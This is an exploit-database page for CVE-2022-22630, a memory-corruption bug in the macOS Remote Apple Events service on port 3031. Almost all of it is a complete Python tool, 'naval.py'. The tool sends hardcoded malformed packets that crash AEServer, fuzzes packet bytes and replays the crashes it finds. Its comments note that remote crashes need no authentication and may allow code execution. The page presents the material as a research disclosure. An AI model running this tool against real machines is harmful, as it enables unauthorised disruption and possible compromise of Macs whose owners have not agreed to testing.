Apple macOS Remote Events Memory Corruption
CVE
Category
Price
Severity
CVE-2022-22630
CWE-119
Not specified
High
Author
Risk
Exploitation Type
Date
Google Project Zero
High
Remote
2022-09-06
CVSS vector description
Metric
Value
Metric Description
Value Description
Attack vector Local AV The vulnerable system is not bound to the network stack and the attacker’s path is via read/write/execute capabilities. Either: the attacker exploits the vulnerability by accessing the target system locally (e.g., keyboard, console), or through terminal emulation (e.g., SSH); or the attacker relies on User Interaction by another person to perform actions required to exploit the vulnerability (e.g., using social engineering techniques to trick a legitimate user into opening a malicious document). Attack Complexity Low AC The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system. Privileges Required Low PR The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources. User Interaction None UI The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges Scope Unchanged S An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances. Confidentiality High C There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data. Integrity High I There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system. Availability High A There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022090011 Apple macOS Remote Events Memory Corruption #!/usr/bin/env python
# -*- coding: UTF-8 -*-
#
# naval.py
#
# Apple macOS Remote Events Remote Memory Corruption Vulnerability
#
# Jeremy Brown [jbrown3264/gmail]
#
# =====
# Intro
# =====
#
# [eppc] Hello from AEServer
#
# Remote Apple Events is a core service and remote system administration and automation
# tool for Macs. It can be enabled via System Preferences -> Sharing and listens on
# port tcp/3031 and may be used in enterprise environments for remote administration.
# Sending malformed packets triggers a crash in the AEServer binary which may allow for
# arbitrary code execution on the remote machine within the context of the _eppc user.
# However, the crash is subtle as the service is automatically restarted and only a log
# in /Library/Logs/DiagnosticReports/AEServer_*.crash is generated if ReportCrash is enabled.
#
# Although a controlled, reliable crash at an arbitrary location is difficult, it was
# eventually achieved during testing with repeated characters in packets during sessions.
#
# Thread 0 crashed with X86 Thread State (64-bit):
# rax: 0x4242424242424242 rbx: 0x0000000000000006 rcx: 0x0000424242424240 rdx: 0x00000000000e6370
# rdi: 0x00007fb041c0ab40 rsi: 0x0000000103d3ba00 rbp: 0x00007ffeebef99f0 rsp: 0x00007ffeebef99b8
# r8: 0x0000000000000020 r9: 0x0000000000000002 r10: 0x00007fb041c00000 r11: 0x00007fb041c0e1c0
# r12: 0x000000000000000d r13: 0x00007fff8091afe0 r14: 0x00007fb041c251b0 r15: 0x00007fb041c25218
# rip: 0x00007fff202d541f rfl: 0x0000000000010202 cr2: 0x0000424242424260
#
# While debugging it looks like the process is crashing when trying to release or
# dereference memory that has been deallocated, likely a sign of a heap related bug
# such as a use-after-free bug.
#
# This code serves as a toolkit to help debug and trigger crashes, but as mentioned
# extensive testing was required to gain more precise control of rax/rcx. Also note
# that authentication is not required to trigger crashes service locally or remotely.
#
# =======
# Details
# =======
#
# Much of the functionality depends on running this locally on the target box, such
# as debugging with ReportCrash logs, but it can certainly trigger remote crashes too
# if you pass the --remote flag (disables local debugging stuff).
#
# $ ./naval.py 10.0.0.12 --fuzz // use --original to fuzz with the non-crashing packets
# ....
#
# $ head crashes.txt
# 1 - (0x7e @ 1) -> 0x20
# [many more truncated]
#
# $ ./naval.py 10.0.0.12 --sleep --replay "1:7e:1" // pkt:byte:index
# ....
#
# Then within 10 seconds, start the debugger on the local target.. GOGOGO
#
# $ sudo lldb -o "attach --name AEServer" -o c
# ....
#
# (lldb) c
# Process 50050 resuming
# Process 50050 stopped
# * thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x7fd1d0e1bd8)
# frame #0: 0x00007fff2028341f libobjc.A.dylib`objc_release + 31
#
# And now you can explore the crash
#
# One can also check to see AEServer receving packets:
# > dtrace -n 'syscall::*recv*:entry { printf("-> %s (pid=%d)", execname, pid); }' | grep AEServer
#
# ===
# Fix
# ===
# - Addressed in Monterey 12.3
#
# CVE-2022-22630
#
import os
import sys
import argparse
import datetime
import time
import psutil
import shutil
import signal
import socket
import random
import re
REPORT_DIR = '/Library/Logs/DiagnosticReports'
LOG_DIR = 'logs'
PORT = 3031 # eppc
CRASH_LOG = 'crashes' + str(datetime.datetime.now().strftime("%Y%m%d_%H%M%S")) + '.txt'
REPORT_CRASH = True
SLEEP_TIME = 10
MAX_BYTE = 255 # 0xff
#
# original packets
#
PKT_1_ORIG = b'PPCT\x00\x00\x00\x01\x00\x00\x00\x01'
PKT_2_ORIG = b'\xe4LPRT\x01\xe1\x01\xe7\x06finder\xdf\xdb\xe3\x02\x01=\xdf\xdf\xdf\xdf\xd5\x00'
PKT_3_ORIG = b'\xe4SREQ\xdf\xdf\xdf\xdf\xdf\x01\xe7\x06finder\xdf\xdb\xe5\x04B{\xbf\xac\xdf\xdf\xdf\xdf\xdf\xdf\xdf\xdf\xdc\xe5\x04test\xdf\xdd\x00'
PKT_4_ORIG = b'\x16\x03\x01\x00\x92\x01\x00\x00\x8e\x03\x03\x61\x00\x8b\x66\x96\xc7\x08\xa2\xe8\x0e\x53\x13\xbd\xd3\x1c\x69\x12\x43\xd3\x03\xe2\xec\x8d\x61\x3d\x01\xed\x67\xd7\x62\xf8\xca\x00\x00\x2c\x00\xff\xc0\x2c\xc0\x2b\xc0\x24\xc0\x23\xc0\x0a\xc0\x09\xc0\x08\xc0\x30\xc0\x2f\xc0\x28\xc0\x27\xc0\x14\xc0\x13\xc0\x12\x00\x9d\x00\x9c\x00\x3d\x00\x3c\x00\x35\x00\x2f\x00\x0a\x01\x00\x00\x39\x00\x0a\x00\x08\x00\x06\x00\x17\x00\x18\x00\x19\x00\x0b\x00\x02\x01\x00\x00\x0d\x00\x12\x00\x10\x04\x01\x02\x01\x05\x01\x06\x01\x04\x03\x02\x03\x05\x03\x06\x03\x00\x05\x00\x05\x01\x00\x00\x00\x00\x00\x12\x00\x00\x00\x17\x00\x00'
PKT_5_ORIG = b'\x16\x03\x03\x00\x46\x10\x00\x00\x42\x41\x04\x8d\xd9\xbc\x5f\x9b\x0d\x86\x28\xda\x1f\xba\x75\xe3\x01\x06\x73\xf4\x28\xe2\xe5\x9b\x2e\xfc\x75\x0c\xad\x3d\x7d\xc8\x59\xc0\x20\xce\xcb\xdf\x87\x88\x09\x46\x1f\xf3\x97\x3f\xb8\xd1\xc8\xf5\x4b\xa9\x9f\xdc\xae\xba\x75\x50\xfa\x96\xd5\xcf\xa2\xa4\xec\x7b\x61'
#
# crashing packets
#
PKT_1 = b'PPCT\x00\x00\x00\x01\x00\x00\x00\x01'
PKT_2 = b'\xe4LPRT\x01\xe1\x01\xe7\x06xxxyyy\xdf\xdb\xe3\x02\x01=\xdf\xdf\xdf\xdf\xd5\x00' # s/finder/xxxyyy
class Naval(object):
def __init__(self, args):
self.host = args.host
self.fuzz = args.fuzz
self.replay = args.replay
self.remote = args.remote
self.reprofile = args.reprofile
self.original = args.original
self.sleep = args.sleep
self.pkt1 = None
self.pkt2 = None
# original
self.pkt3 = None
self.pkt4 = None
self.pkt5 = None
self.pkt_pick = 0
self.pkt_num = None
self.byte = None
self.index = None
self.logs = []
def run(self):
if(self.remote):
REPORT_CRASH = False
else:
REPORT_CRASH = True
if(REPORT_CRASH):
#
# sudo launchctl load -w /System/Library/LaunchAgents/com.apple.ReportCrash.plist
#
if('ReportCrash' not in (proc.name() for proc in psutil.process_iter())):
print("ReportCrash isn't running, make sure it's enabled first\n")
return -1
if(os.path.isdir(REPORT_DIR)):
try:
logs = os.listdir(REPORT_DIR)
except Exception as error:
print("failed to list %s: %s\n" % (REPORT_DIR, error))
return -1
else:
print("dir %s doesn't exist, can't fuzz and check for crashes\n" % REPORT_DIR)
return -1
if(self.original):
# non-crashing
self.pkt1 = PKT_1_ORIG
self.pkt2 = PKT_2_ORIG
self.pkt3 = PKT_3_ORIG
self.pkt4 = PKT_4_ORIG
self.pkt5 = PKT_5_ORIG
else:
# crashing
self.pkt1 = PKT_1
self.pkt2 = PKT_2
if(self.replay):
if(len(self.replay.split(':')) != 3):
print("invalid replay format: %s" % self.replay)
return -1
replay = self.replay.split(':')
try:
self.pkt_num = int(replay[0])
except Exception as error:
print("packet number %s is invalid: %s", (pkt_num, error))
return -1
try:
self.byte = int(replay[1], 16)
except Exception as error:
print("byte %s is invalid: %s", (byte, error))
return -1
try:
self.index = int(replay[2])
except Exception as error:
print("index %s is invalid: %s", (index, error))
return -1
if(self.pkt_num == 1):
pkt = self.modifyPacket(self.pkt1, self.byte, self.index)
if(pkt == None):
return -1
elif(self.pkt_num == 2):
pkt = self.modifyPacket(self.pkt2, self.byte, self.index)
if(pkt == None):
return -1
else:
print("pkt number must be 1 or 2")
return -1
print("replaying packets\n")
self.showRepro(pkt)
if(self.reprofile):
if(self.repro(self.reprofile) < 0):
print("failed")
return -1
return 0
#
# fuzz each packet one after another
#
if(self.fuzz):
print("fuzzing sequentially packet 1\n")
self.pkt_num = 1
if(self.fuzzPacketSeq(self.pkt1) < 0):
print("failed")
return -1
print("fuzzing sequentially packet 2\n")
self.pkt_num = 2
if(self.fuzzPacketSeq(self.pkt2) < 0):
print("failed")
return -1
if(self.original):
self.pkt_num = 3
if(self.fuzzPacketSeq(self.pkt3) < 0):
print("failed")
return -1
self.pkt_num = 4
if(self.fuzzPacketSeq(self.pkt4) < 0):
print("failed")
return -1
self.pkt_num = 5
if(self.fuzzPacketSeq(self.pkt5) < 0):
print("failed")
return -1
else:
if(not self.replay):
if(self.original):
print("sending original packets for testing\n")
else:
print("sending packets to trigger crash\n")
self.showRepro([])
sock = self.getSock()
if(sock == None):
return -1
try:
sock.connect((self.host, PORT))
except Exception as error:
print("connect() failed: %s\n" % error)
return -1
if(self.sleep):
time.sleep(SLEEP_TIME)
try:
sock.send(self.pkt1)
sock.recv(256)
except Exception as error:
print("failed to send/recv packet 1: %s\n" % error)
return -1
try:
sock.send(self.pkt2)
except Exception as error:
print("failed to send packet 2: %s\n" % error)
return -1
if(self.original):
try:
sock.send(PKT_3_ORIG)
except Exception as error:
print("failed to send packet 3: %s\n" % error)
return -1
try:
sock.send(PKT_4_ORIG)
except Exception as error:
print("failed to send packet 4: %s\n" % error)
return -1
try:
sock.send(PKT_5_ORIG)
except Exception as error:
print("failed to send packet 5: %s\n" % error)
return -1
sock.close()
if(REPORT_CRASH):
self.checkReports()
print("done\n")
return 0
def getSock(self):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(1)
except Exception as error:
print("socket() failed: %s\n" % error)
return None
return sock
def fuzzPacketSeq(self, packet):
c = 0
i = 0
#
# flip each byte in the packet sequentially from 0 ... 255
#
while(i < len(packet)):
while(c <= MAX_BYTE):
pkt = bytearray(packet)
self.index = i
self.byte = c
orig = pkt[self.index]
pkt[self.index] = self.byte
print("pkt @ index=%d (%s -> %s)" % (self.index, hex(orig), hex(pkt[self.index])))
sock = self.getSock()
if(sock == None):
return -1
try:
sock.connect((self.host, PORT))
except Exception as error:
print("connect() failed: %s\n" % error)
continue
if(self.sendPacket(sock, pkt) < 0):
print("sendPacket() failed\n")
return -1
sock.close()
self.showRepro(pkt)
if(REPORT_CRASH):
self.checkReports()
c += 1
c = 0
i += 1
return 0
def createPacket(self, pkt_name):
n = random.randint(8,4096)
print("created \\x42 x %d for %s\n" % (n, pkt_name))
return str.encode('B' * n)
def modifyPacket(self, pkt, byte, index):
if((index < 0) or (index >= len(pkt))):
print("index must be 0 - %d\n" % (len(pkt)-1))
return -1
pkt = pkt[:index] + bytes([byte]) + pkt[index + 1:]
return pkt
def sendPacket(self, sock, pkt):
try:
if(self.pkt_pick == 1):
sock.send(pkt)
else:
sock.send(self.pkt1)
sock.recv(256)
except socket.timeout:
print("timed out")
except Exception as error:
print("send/recv failed for packet #1: %s\n" % error)
try:
if(self.pkt_pick == 2):
sock.send(pkt)
else:
sock.send(self.pkt2)
if(self.original):
sock.recv(256) # not necessary for crashing packets 1 & 2
except Exception as error:
print("send/recv failed for packet #2: %s\n" % error)
if(self.original):
try:
if(self.pkt_pick == 3):
sock.send(pkt)
else:
pick = random.randint(1,2)
#
# pick=1 means self.pkt3 doesn't change
#
if(pick == 2):
self.pkt3 = self.createPacket('pkt3')
sock.send(self.pkt3)
sock.recv(256)
except Exception as error:
print("send/recv failed for packet #3: %s\n" % error)
try:
if(self.pkt_pick == 4):
sock.send(pkt)
else:
pick = random.randint(1,2)
if(pick == 2):
self.pkt4 = self.createPacket('pkt4')
sock.send(self.pkt4)
sock.recv(256)
except Exception as error:
print("send/recv failed for packet #4: %s\n" % error)
try:
if(self.pkt_pick == 5):
sock.send(pkt)
else:
pick = random.randint(1,2)
if(pick == 2):
self.pkt5 = self.createPacket('pkt5')
sock.send(self.pkt5)
sock.recv(256)
except Exception as error:
print("send/recv failed for packet #5: %s\n" % error)
return 0
def repro(self, filename):
print("reproing crash with %s\n" % os.path.basename(filename))
try:
with open(filename, 'r') as file:
data = file.readlines()
except Exception as error:
print("failed to read file %s: %s" % (filename, error))
return -1
try:
self.pkt1 = bytes.fromhex(data[0].replace('\\x', ''))
self.pkt2 = bytes.fromhex(data[1].replace('\\x', ''))
if(self.original):
self.pkt3 = bytes.fromhex(data[2].replace('\\x', ''))
self.pkt4 = bytes.fromhex(data[3].replace('\\x', ''))
self.pkt5 = bytes.fromhex(data[4].replace('\\x', ''))
except Exception as error:
print("failed to parse repro: %s" % error)
return -1
sock = self.getSock()
if(sock == None):
return -1
try:
sock.connect((self.host, PORT))
except Exception as error:
print("connect() failed: %s\n" % error)
return -1
if(self.sleep):
time.sleep(SLEEP_TIME)
try:
sock.send(self.pkt1)
sock.recv(256)
except socket.timeout:
print("timed out")
except Exception as error:
print("send/recv failed for packet #1: %s\n" % error)
try:
sock.send(self.pkt2)
if(self.original):
sock.recv(256) # not necessary for crashing packets 1 & 2
except Exception as error:
print("send/recv failed for packet #2: %s\n" % error)
if(self.original):
try:
sock.send(self.pkt3)
sock.recv(256)
except Exception as error:
print("send/recv failed for packet #3: %s\n" % error)
try:
sock.send(self.pkt4)
sock.recv(256)
except Exception as error:
print("send/recv failed for packet #4: %s\n" % error)
try:
sock.send(self.pkt5)
sock.recv(256)
except Exception as error:
print("send/recv failed for packet #5: %s\n" % error)
sock.close()
self.showRepro([])
if(REPORT_CRASH):
self.checkReports()
print("done\n")
return 0
def getHex(self, data):
return ''.join(f'\\x{byte:02x}' for byte in data)
def printHex(self, data):
print(''.join(f'\\x{byte:02x}' for byte in data))
def showRepro(self, pkt):
if(len(pkt) == len(self.pkt1)):
self.printHex(pkt)
else:
self.printHex(self.pkt1)
if(len(pkt) == len(self.pkt2)):
self.printHex(pkt)
else:
self.printHex(self.pkt2)
if(self.original):
if(len(pkt) == len(self.pkt3)):
self.printHex(pkt)
else:
self.printHex(self.pkt3)
if(len(pkt) == len(self.pkt4)):
self.printHex(pkt)
else:
self.printHex(self.pkt4)
if(len(pkt) == len(self.pkt5)):
self.printHex(pkt)
else:
self.printHex(self.pkt5)
print()
#
# restore original packets
#
self.pkt3 = PKT_3_ORIG
self.pkt4 = PKT_4_ORIG
self.pkt5 = PKT_5_ORIG
def checkReports(self):
time.sleep(2) # make sure ReportCrash has time to do its thing
try:
logs_now = os.listdir(REPORT_DIR)
except Exception as error:
print("failed to open %s for reading: %s\n" % (REPORT_DIR, error))
return -1
if(len(logs_now) > len(self.logs)):
logs_new = list(set(logs_now) - set(self.logs))
#
# if we have new crash logs, grab the pc and correlate it with repro
#
for log in logs_new:
if(log.startswith('AEServer') and log.endswith('.crash')):
log_file = REPORT_DIR + os.sep + log
try:
with open(log_file, 'r') as file:
data = file.read()
except Exception as error:
print("failed to read %s: %s\n" % (log, error))
return -1
pc = re.search('0x(.*)', data)
if(pc != None):
pc = '0x' + pc.group(1).lstrip('0')
else:
print("couldn't get pc from crash log\n")
print("found crash @ pc=%s\n" % pc)
#
# create a crash log if we're fuzzing or replaying bytes at indices
#
if(self.fuzz):
crash_info = 'pkt #' + str(self.pkt_num) + ' - (byte=' + hex(self.byte) + ' @ index=' + str(self.index) + ') -> ' + pc + '\n'
try:
with open(CRASH_LOG, 'a') as file:
file.write(crash_info)
except Exception as error:
print("failed to write %s: %s\n" % (crash_info, error))
return -1
if(not os.path.isdir(LOG_DIR)):
try:
os.mkdir(LOG_DIR)
except Exception as error:
print("failed to mkdir %s: %s\n" % (LOG_DIR, error))
log_name = LOG_DIR + os.sep + os.path.basename(log_file) + '_' + str(self.byte) + '_' + str(self.index) + '_' + pc + '.txt'
#
# move crash log file
#
try:
shutil.move(log_file, log_name)
except Exception as error:
print("failed to move %s: %s\n" % (log_file, error))
return -1
ips_file = REPORT_DIR + os.sep + log.split('.')[0] + '.ips'
ips_name = LOG_DIR + os.sep + os.path.basename(log_file) + '_' + str(self.byte) + '_' + str(self.index) + '_' + pc + '.txt'
#
# check if there's an associated .ips
#
if(os.path.isfile(ips_file)):
try:
# shutil.move(ips_file, LOG_DIR)
shutil.move(ips_file, ips_name)
except Exception as error:
print("failed to move %s: %s\n" % (ips_file, error))
return -1
#
# write repro if random fuzzing (no byte/index to replay)
#
# note: possible bug somewhere preventing pkt 3-5 from saving the correct repro,
# (eg. if mutated with B's), so for now we're just extra verbose with output when
# mutating packets and stop if pc contains 424242 so we can debug from there
#
repro_name = LOG_DIR + os.sep + os.path.basename(log_file) + '_' + pc + '_' + 'repro' + '.txt'
try:
with open(repro_name, 'w') as file:
file.write(self.getHex(self.pkt1))
file.write('\n')
file.write(self.getHex(self.pkt2))
if(self.original):
file.write('\n')
file.write(self.getHex(self.pkt3))
file.write('\n')
file.write(self.getHex(self.pkt4))
file.write('\n')
file.write(self.getHex(self.pkt5))
except Exception as error:
print("failed to write %s: %s\n" % (repro_name, error))
return -1
#
# temporary to help triage crashing packets
#
if('424242' in pc):
self.showRepro([])
sys.exit(0)
#
# reset logs after move
#
try:
self.logs = os.listdir(REPORT_DIR)
except Exception as error:
print("failed to list %s: %s\n" % (REPORT_DIR, error))
return -1
return 0
def stop(signum, frame):
print()
sys.exit(0)
def arg_parse():
parser = argparse.ArgumentParser()
parser.add_argument("host",
type=str,
help="target listening on eppc port 3031")
parser.add_argument("--fuzz",
"--fuzz",
default=False,
action="store_true",
help="sequentially exhaust bytes in each packet and display crashing PC as available")
parser.add_argument("--remote",
"--remote",
default=False,
action="store_true",
help="target remote hosts and turn disable local debugging support")
parser.add_argument("--replay",
"--replay",
type=str,
help="replay crash with the following format [pkt:byte:index], eg. 2:ff:3")
parser.add_argument("--reprofile",
"--reprofile",
type=str,
help="filename containing packet data on each line to replay (generated by random fuzzing)")
parser.add_argument("--original",
"--original",
default=False,
action="store_true",
help="use the original non-crashing packets")
parser.add_argument("--sleep",
"--sleep",
default=False,
action="store_true",
help="sleep helper for time to lldb attach after launchd creates the AEServer process upon connection (10 secs)")
args = parser.parse_args()
return args
def main():
signal.signal(signal.SIGINT, stop)
args = arg_parse()
nr = Naval(args)
result = nr.run()
if(result > 0):
sys.exit(-1)
if(__name__ == '__main__'):
main()
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only.Terms of Use and Privacy Policy and Impressum